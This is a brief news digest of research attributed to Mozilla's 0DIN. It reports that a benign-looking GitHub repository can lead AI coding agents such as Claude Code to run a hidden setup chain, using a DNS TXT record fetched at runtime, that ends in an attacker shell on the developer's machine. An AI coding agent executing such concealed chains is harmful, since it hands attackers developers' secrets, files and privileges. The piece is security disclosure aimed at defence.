Clean GitHub repo tricks AI coding agents into running malware

Clean GitHub repo tricks AI coding agents into running malware
Researchers at Mozilla’s 0DIN showed that a clean-looking GitHub repository can trigger an invisible attack chain when an agentic coding tool like Claude Code tries to fix a normal setup error. The method can end with an attacker-controlled shell on a developer’s device, exposing secrets, files, and persistence opportunities through indirect steps the agent never fully sees. #ClaudeCode #0DIN #GitHub #Anthropic

Keypoints

  • A benign-looking GitHub repository can hide a malicious setup chain.
  • Claude Code may automatically run a command to recover from a normal installation error.
  • The attack can use a DNS TXT record to deliver attacker-controlled data at runtime.
  • Successful exploitation can give the attacker a shell with the developer’s privileges.
  • 0DIN says AI agents should disclose the full execution chain of setup commands.

Read More: https://www.bleepingcomputer.com/news/security/clean-github-repo-tricks-ai-coding-agents-into-running-malware/